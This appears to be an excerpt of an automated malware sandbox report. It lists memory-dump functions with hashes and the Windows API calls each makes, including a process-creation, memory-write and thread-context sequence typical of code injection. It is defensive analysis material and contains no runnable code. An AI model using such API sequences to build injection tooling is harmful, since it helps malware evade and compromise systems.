                                                • Opcode ID: f9fa1f82c5c3898464b0dbd48ff91adb5f5a907fa91ce83002e026e8147af264
                                                • Instruction ID: b509832bb2236e350bfa140e0cf6bfc6ea8cd1e373e0764757ad74a611a7bb11
                                                • Opcode Fuzzy Hash: f9fa1f82c5c3898464b0dbd48ff91adb5f5a907fa91ce83002e026e8147af264
                                                • Instruction Fuzzy Hash: 32812970D141598BCB14DF69D980A9DFBF2FF89304F28C1A9D548A7315D7309A81CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 706b8007d74c9d0d2b0b877fd60ff759716ec4c811abb9a7b9838b3d01bf074c
                                                • Instruction ID: f12febb0a9e69ae2ee362ba29aaadc8884a50969faa5e8bdd9d0cd3cc6524e7c
                                                • Opcode Fuzzy Hash: 706b8007d74c9d0d2b0b877fd60ff759716ec4c811abb9a7b9838b3d01bf074c
                                                • Instruction Fuzzy Hash: 85810870D142598BDB14DF69D580AAEFBF2FF89304F28C1A9D548A7316D7309A81CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 116ba043d2a9eed8bd9ef6c2120aa0b35241e6b7015ec1a5a480a3df9f8f43e5
                                                • Instruction ID: 5874b862d09a6b90dcc05d8f7953a3b72f664a0a8aaca08d5080ef4acf62c590
                                                • Opcode Fuzzy Hash: 116ba043d2a9eed8bd9ef6c2120aa0b35241e6b7015ec1a5a480a3df9f8f43e5
                                                • Instruction Fuzzy Hash: F4514970E10219DFDB54CF69D855BAEBBF2BF89300F1480A9D508AB265DB319E81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6d61c2759b5e16623be102a284c261514ea622e760fec7f047a827f7a543a5c
                                                • Instruction ID: 610b0d756b33d4b0ce94da5f000c1fdcb4cebe88f8443fcd5397811dc236d635
                                                • Opcode Fuzzy Hash: f6d61c2759b5e16623be102a284c261514ea622e760fec7f047a827f7a543a5c
                                                • Instruction Fuzzy Hash: 6751BE70E142198FCB04CFA9DC41B9EFBB2BF8A314F18C1AAD948A7755DB345A81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acbbad849990acb4a3e509b7d203f702411b2e1a6854667d95227321c792687c
                                                • Instruction ID: 5cb7a6ccf0c2dad00b4a930a88bad3c2a19fc4c7228459a2d5c545cc0f55a92e
                                                • Opcode Fuzzy Hash: acbbad849990acb4a3e509b7d203f702411b2e1a6854667d95227321c792687c
                                                • Instruction Fuzzy Hash: 8E412870E11219DFDB18CFAAD881B9EFBB2BF89310F14D16AD608A7355DB705A81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dac72af69d5f917c90fd9763066d18e350a764bc755d038588f7f40f842fd5bb
                                                • Instruction ID: 0374b53fa32a8a50cf666e5d5577ca8e5ca853d7cb65d3d18c5142123241d9c6
                                                • Opcode Fuzzy Hash: dac72af69d5f917c90fd9763066d18e350a764bc755d038588f7f40f842fd5bb
                                                • Instruction Fuzzy Hash: 34312171D087848FD70ACFBB98142DABFF3AFCA200F09C1EAC444AA166DA341546CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00E06BB0
                                                • GetCurrentThread.KERNEL32 ref: 00E06BED
                                                • GetCurrentProcess.KERNEL32 ref: 00E06C2A
                                                • GetCurrentThreadId.KERNEL32 ref: 00E06C83
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 5ac9d4725b29f9ee982f13731d1bf99f3a62b1e0a1d8b2588c8e8fa7707b5849
                                                • Instruction ID: 3b7f74e691175e121d78c8aea3f75d1170aa64bab6b2f5abb905b038b190d67f
                                                • Opcode Fuzzy Hash: 5ac9d4725b29f9ee982f13731d1bf99f3a62b1e0a1d8b2588c8e8fa7707b5849
                                                • Instruction Fuzzy Hash: B15146B49002499FEB14CFA9C648BDEBBF0EF88314F248459E159B7390D7746884CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E052A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 6274dce129fde5b517963730100d80dfbf73008dbfeb876398a8e1254d5bd894
                                                • Instruction ID: ad14293d0fd414a07b7aafc849f5820f6592d0e3d37b1f3e92dac33d652f9083
                                                • Opcode Fuzzy Hash: 6274dce129fde5b517963730100d80dfbf73008dbfeb876398a8e1254d5bd894
                                                • Instruction Fuzzy Hash: 9A51C0B1D007499FDF14CFA9C884ADEBBB5FF88314F24812AE819AB250D7749885CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E052A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4742674a271070e61631752e6cb1cc2096d369ef4f86962dc378864ad446fa0d
                                                • Instruction ID: 00cf490d8bc28c6665daf224fb4b8fcf4308e02402121e7d0f2a985683514f05
                                                • Opcode Fuzzy Hash: 4742674a271070e61631752e6cb1cc2096d369ef4f86962dc378864ad446fa0d
                                                • Instruction Fuzzy Hash: C341C0B1D003099FDF14CF99C884ADEBBB5FF88314F24812AE819AB250D7749885CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00E07CF9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 93e8119f13ae3d5d094276e19248872feced1048a014da874b68a0d602a3a03c
                                                • Instruction ID: 47443f8b06a80162fcaeb89b1901400ef70ed4d5c70d3fe51bcf31218f63cf96
                                                • Opcode Fuzzy Hash: 93e8119f13ae3d5d094276e19248872feced1048a014da874b68a0d602a3a03c
                                                • Instruction Fuzzy Hash: 6C415CB8A04245DFDB14CF59C488BAAFBF5FF88314F248459E559AB361C774A881CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E06DFF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 86afb6fb4dd4e8bfcbfa1b71e11d15736991185424a779b9271c562603aae186
                                                • Instruction ID: d701d61a1aa22f73e51c66ee8bfaad5555afcdd6754d0ec0d09d7729a34db8d9
                                                • Opcode Fuzzy Hash: 86afb6fb4dd4e8bfcbfa1b71e11d15736991185424a779b9271c562603aae186
                                                • Instruction Fuzzy Hash: 582100B59002489FDB10CFA9D484BEEBBF4EB48324F14802AE954A7350D378A950CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E06DFF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4c9203761680f25cb9aba86b536bb50b095b6e9668d4f965159479c01090b05a
                                                • Instruction ID: a45b7082ddc3de80ffbbbda72a582f5041eb8edbde129027ad244490a0b50170
                                                • Opcode Fuzzy Hash: 4c9203761680f25cb9aba86b536bb50b095b6e9668d4f965159479c01090b05a
                                                • Instruction Fuzzy Hash: D421E4B59002489FDB10CF99D584BDEBBF8EB48324F14802AE914A7350D374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlEncodePointer.NTDLL(00000000), ref: 00E0C442
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.918783563.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID:
                                                • API String ID: 2118026453-0
                                                • Opcode ID: b29f06dca58bb842a5d87614d9e6dd9e32969ee18d8f348d1ffc14b70e090687
                                                • Instruction ID: b4c2814eb86c8e3dfb5f2ab11750c955822f3083f7174a9aa4d0c8ad7f2dc929
                                                • Opcode Fuzzy Hash: b29f06dca58bb842a5d87614d9e6dd9e32969ee18d8f348d1ffc14b70e090687
                                                • Instruction Fuzzy Hash: 0B1197B59003058FDB10DFA9C90879EBBF4FB48318F24892AD815B3281C779A885CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf0cc3a34bedc89c4f8cd4827cc805602dca75255db5e3e800c2aeb107b14d7c
                                                • Instruction ID: ff96b6d1fe0da0c510482529826d45e0a61624a9f8a36dda7345aaf42f0bae5b
                                                • Opcode Fuzzy Hash: bf0cc3a34bedc89c4f8cd4827cc805602dca75255db5e3e800c2aeb107b14d7c
                                                • Instruction Fuzzy Hash: 5D42E234700204CFDB699FB4D868A6E77B6FF99205F21847ED90ADB360DA76E841CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00CFFECA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID: jQw$jQw
                                                • API String ID: 716092398-3539227365
                                                • Opcode ID: 40f843d8d42eced15f13df663f07a8582e9536f611c9731f7f2f7efd8925da87
                                                • Instruction ID: a1b1deca32b8024f5b783b1758a878a5bdd330c5b3fa1426a2ba2ab282649dfd
                                                • Opcode Fuzzy Hash: 40f843d8d42eced15f13df663f07a8582e9536f611c9731f7f2f7efd8925da87
                                                • Instruction Fuzzy Hash: FE51D1B1C002499FDB14CFAAD880ADEBBF5FF48314F24862AE515AB250D7749946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00CFFECA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID: jQw$jQw
                                                • API String ID: 716092398-3539227365
                                                • Opcode ID: ec128dd1ec6501d02f854a4b1af59151a0914340301dff465b32d76cc783b0c1
                                                • Instruction ID: ac0165ed1b8fd7c0b0f9082744e3015cb36eb677f6a0a7ef30a9dab913fa8a5f
                                                • Opcode Fuzzy Hash: ec128dd1ec6501d02f854a4b1af59151a0914340301dff465b32d76cc783b0c1
                                                • Instruction Fuzzy Hash: C551C0B1D002099FDB14CF9AD884ADEBBB5FF48314F24822AE919AB210D7749946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CF966E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: jQw
                                                • API String ID: 4139908857-1719204100
                                                • Opcode ID: af409e0f44b20bf7433e9e7e627ea25c65b802418f7c82f5d05e8a8597c3b501
                                                • Instruction ID: 79a3df0ac892810dca69c3e684066c21fe695e907abfbcf16c1f06d2753cb3db
                                                • Opcode Fuzzy Hash: af409e0f44b20bf7433e9e7e627ea25c65b802418f7c82f5d05e8a8597c3b501
                                                • Instruction Fuzzy Hash: F0710870A00B098FDB64DF6AD04576ABBF1FF88304F108A29E556D7A50DB74E905CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026171D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: jQw
                                                • API String ID: 963392458-1719204100
                                                • Opcode ID: 7bf28fdc4b2598ee8d0072d9662acb400363f8a7d17ba562c38735c4a4b0cece
                                                • Instruction ID: c1c9487b8f024e2d81f81c95dc27ab2032710cd62d17dfcb7d6124a442e7e455
                                                • Opcode Fuzzy Hash: 7bf28fdc4b2598ee8d0072d9662acb400363f8a7d17ba562c38735c4a4b0cece
                                                • Instruction Fuzzy Hash: 42512671D00329DFDB25CF95C880BDDBBB2BF48314F1581AAE908A7250DB756A89CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026171D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: jQw
                                                • API String ID: 963392458-1719204100
                                                • Opcode ID: 70c957e5753036d80bd26c16bde9a5d1f655a1a746778b612e400028061d963c
                                                • Instruction ID: 47b87c1abfd0a60bd7059800936718f90fe5edcfa9ea29dea4cbc546557a0f76
                                                • Opcode Fuzzy Hash: 70c957e5753036d80bd26c16bde9a5d1f655a1a746778b612e400028061d963c
                                                • Instruction Fuzzy Hash: CA511771D00329DFDB55CF95C880BDDBBB2BF48304F15849AE908A7210CB756A89CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026171D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: jQw
                                                • API String ID: 963392458-1719204100
                                                • Opcode ID: eb343a4c1aca5689ec9d3ed7798146da5e4e37b8b5ada48ba298a34a039c4727
                                                • Instruction ID: 0d16176664824851cfa371d73b74f8a3dc9bbe5e0e5949967360e74bd8c39ae0
                                                • Opcode Fuzzy Hash: eb343a4c1aca5689ec9d3ed7798146da5e4e37b8b5ada48ba298a34a039c4727
                                                • Instruction Fuzzy Hash: F6511771900329DFDB55CF95C880BDDBBB6BF48314F15809AE908A7210DB756A89CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CF5421
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID: jQw
                                                • API String ID: 2289755597-1719204100
                                                • Opcode ID: 4ecc864ea4e48cb972329aab88f74aa767a602a636c59e72da9ca04a6b026a9c
                                                • Instruction ID: 69620b90928f5524d8cb9555e144b39c67aa3537f4d006282d00006dde45f908
                                                • Opcode Fuzzy Hash: 4ecc864ea4e48cb972329aab88f74aa767a602a636c59e72da9ca04a6b026a9c
                                                • Instruction Fuzzy Hash: 934104B0C0461DCFDB24DFAAC8447DDBBB1BF48308F218069D618AB251DBB56946CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CF5421
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID: jQw
                                                • API String ID: 2289755597-1719204100
                                                • Opcode ID: 9d7762aecda463bc787cd27a34e70924b975f853444e384f8a254e0f1028030d
                                                • Instruction ID: f65e20737916684d75838d5f9c9a3cb1302220f22da3614cdf686ee9a97b2e41
                                                • Opcode Fuzzy Hash: 9d7762aecda463bc787cd27a34e70924b975f853444e384f8a254e0f1028030d
                                                • Instruction Fuzzy Hash: 484142B0C0475DCFDB10CFA9C84478DBBB1BF49308F21846AC248AB251CBB55946CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026176B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: jQw
                                                • API String ID: 3559483778-1719204100
                                                • Opcode ID: 3fd20bf3be927e4a7cec226da4ee202b55458a14a5809ad7a5b54dd4028618a1
                                                • Instruction ID: 1c261f0eafee304746cc0555bb2075467e1cdd029902161c3d49289af221492d
                                                • Opcode Fuzzy Hash: 3fd20bf3be927e4a7cec226da4ee202b55458a14a5809ad7a5b54dd4028618a1
                                                • Instruction Fuzzy Hash: 262103B1900249DFDB10CF9AD985BDEBBF4FB48314F14842AE918A3350D778A944CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CFB93E,?,?,?,?,?), ref: 00CFB9FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID: jQw
                                                • API String ID: 3793708945-1719204100
                                                • Opcode ID: 39a5a001fd99fac00da410db11bcd8eb7215a312c00a71aa28ed07c039482956
                                                • Instruction ID: 21f1797a15394b11dc58861530fb826e2c3516ae185a458112fd6602ee3ec945
                                                • Opcode Fuzzy Hash: 39a5a001fd99fac00da410db11bcd8eb7215a312c00a71aa28ed07c039482956
                                                • Instruction Fuzzy Hash: A721E6B5900249EFDB10CFAAD584BEEBBF4EB48324F14841AE914B3310D374A954DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026176B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: jQw
                                                • API String ID: 3559483778-1719204100
                                                • Opcode ID: 398bca07a90c7c9322aecf26236013aad886126a07036715640c667b503c084d
                                                • Instruction ID: 4f2a14868518ef6fa14f88c35754f44aa16e7ff5b53dbe1087856c26ab2fd322
                                                • Opcode Fuzzy Hash: 398bca07a90c7c9322aecf26236013aad886126a07036715640c667b503c084d
                                                • Instruction Fuzzy Hash: 2621E3B1900259DFDB10CF9AD984BDEBBF4FB48314F14852AE918A3350D778A944CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026176B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: jQw
                                                • API String ID: 3559483778-1719204100
                                                • Opcode ID: 9c255eea15da07074d14949bef543cf2eb249fedd09ea6af2004b06c5f7ab598
                                                • Instruction ID: ccc24ae6d6601071958045b94bda5a60628180b2d111f4c7989ad5bfb487a3cf
                                                • Opcode Fuzzy Hash: 9c255eea15da07074d14949bef543cf2eb249fedd09ea6af2004b06c5f7ab598
                                                • Instruction Fuzzy Hash: 5521E0B1900259DFDB10CF9AC985BDEBBF4FB48324F14852AE918A3350D778A944CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0261752F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: jQw
                                                • API String ID: 1726664587-1719204100
                                                • Opcode ID: 687431441a6c09b6d5ff781495e308fa8bbdf5a87566c153d5e5ceedf0611a74
                                                • Instruction ID: 9f95b5781cae6b0cd45ecf8942c017091a3672b2b9f421bb6c67960d534ec2f0
                                                • Opcode Fuzzy Hash: 687431441a6c09b6d5ff781495e308fa8bbdf5a87566c153d5e5ceedf0611a74
                                                • Instruction Fuzzy Hash: 492102B1900249DFCB10CF9AC884BDEFBF4FB48324F14842AE918A3210D778A941CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadContext.KERNELBASE(?,00000000), ref: 02617467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID: jQw
                                                • API String ID: 1591575202-1719204100
                                                • Opcode ID: 73e0cb83e5436e1cb86184accc87fdbe6e4b00c5c669233660512124690468f7
                                                • Instruction ID: 14e08e5c74e8cf65113079367a94de33e1642119f9370d2458708c91320aab27
                                                • Opcode Fuzzy Hash: 73e0cb83e5436e1cb86184accc87fdbe6e4b00c5c669233660512124690468f7
                                                • Instruction Fuzzy Hash: B721E5B1D0065A9BDB10CF9AC5457DEFBF8AB48624F14812AE518A3240D778A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0261752F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: jQw
                                                • API String ID: 1726664587-1719204100
                                                • Opcode ID: 356c52b63815422d7e672193d19ed46e446b5b922699459c9c5ed3e7ea328882
                                                • Instruction ID: 96a726e6c342d0bc70d7ec2acdf2dfdd284839e8362c35cfdf16276a17464cc6
                                                • Opcode Fuzzy Hash: 356c52b63815422d7e672193d19ed46e446b5b922699459c9c5ed3e7ea328882
                                                • Instruction Fuzzy Hash: 502102B1900249DFDB10CF9AD884BDEFBF4FB48324F14842AE918A3210D738A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0261752F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: jQw
                                                • API String ID: 1726664587-1719204100
                                                • Opcode ID: 15ccbb763c2e53799301b256b4c366a316745ab7ea760a94e224ddb9de1707f1
                                                • Instruction ID: 37639fa8abbd26be17042dbf304e9a636cd87d58b1eac7c6622b71f6212b9b1a
                                                • Opcode Fuzzy Hash: 15ccbb763c2e53799301b256b4c366a316745ab7ea760a94e224ddb9de1707f1
                                                • Instruction Fuzzy Hash: 4621E2B5900259DFDB10CF9AD884BDEFBF4FB48324F14842AE958A3250D778A554CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CFB93E,?,?,?,?,?), ref: 00CFB9FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID: jQw
                                                • API String ID: 3793708945-1719204100
                                                • Opcode ID: cab80dbed9c0a6cb62e5ef77233a3077ecc183aa85468c70e134828c6aa1742e
                                                • Instruction ID: 1f29609d464ed54b432f62d82ffb082a1c7c189018daff1dc8d7216965097dfb
                                                • Opcode Fuzzy Hash: cab80dbed9c0a6cb62e5ef77233a3077ecc183aa85468c70e134828c6aa1742e
                                                • Instruction Fuzzy Hash: A921E2B5900249DFDB00CFA9D584BDEBBF5FB48324F14852AE958A7350C778A950CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadContext.KERNELBASE(?,00000000), ref: 02617467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID: jQw
                                                • API String ID: 1591575202-1719204100
                                                • Opcode ID: cc3b2ca4ed530439454f8d76d043a7a2da30c739cb7ab218a43b17ddb8ac0bb9
                                                • Instruction ID: 4ff31fdd179c887fead67567eae325c055729f01f515e185940c974411dc7678
                                                • Opcode Fuzzy Hash: cc3b2ca4ed530439454f8d76d043a7a2da30c739cb7ab218a43b17ddb8ac0bb9
                                                • Instruction Fuzzy Hash: DE21F2B1E0065A9FDB00CF9AD5857EEFBB4BB48224F14812AE418A3340D778A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadContext.KERNELBASE(?,00000000), ref: 02617467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795259774.0000000002610000.00000040.00000001.sdmp, Offset: 02610000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID: jQw
                                                • API String ID: 1591575202-1719204100
                                                • Opcode ID: 9ff76fa5e061c6136fcd234292e40766875de17a3d511c9fad6775162605e6ad
                                                • Instruction ID: dc39dd3b014b4d9e31f18695c1883833747237c8762e50446e43859b61ce83e6
                                                • Opcode Fuzzy Hash: 9ff76fa5e061c6136fcd234292e40766875de17a3d511c9fad6775162605e6ad
                                                • Instruction Fuzzy Hash: 9221F4B1E0065A9FDB00CF9AC5857DEFBF8BB48624F14812AE418A3340D778A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CF96E9,00000800,00000000,00000000), ref: 00CF98FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: jQw
                                                • API String ID: 1029625771-1719204100
                                                • Opcode ID: 3c8b30fd8572e5c7a647d8ff09e0303fb7e20e1bb878417bd3832a7225aa5d94
                                                • Instruction ID: 1699766f52a343a7a8fdfa4016911d7ba32403731f2fdf489e9a595f43279a2d
                                                • Opcode Fuzzy Hash: 3c8b30fd8572e5c7a647d8ff09e0303fb7e20e1bb878417bd3832a7225aa5d94
                                                • Instruction Fuzzy Hash: 171133B2D002499FDB10CF9AC444BEEBBF4EB48364F10842AE519A7200C374AA45CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CF96E9,00000800,00000000,00000000), ref: 00CF98FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.795052267.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: jQw
                                                • API String ID: 1029625771-1719204100
                                                • Opcode ID: 9fd7f6bed93bb6191c542f57152eff8c70aada21d9a0f1c5c82ce665ce57e58b
                                                • Instruction ID: a4418ec3779ab94c95484c7b08a914b68db923d831c92afc057b1bef78d1fcc8
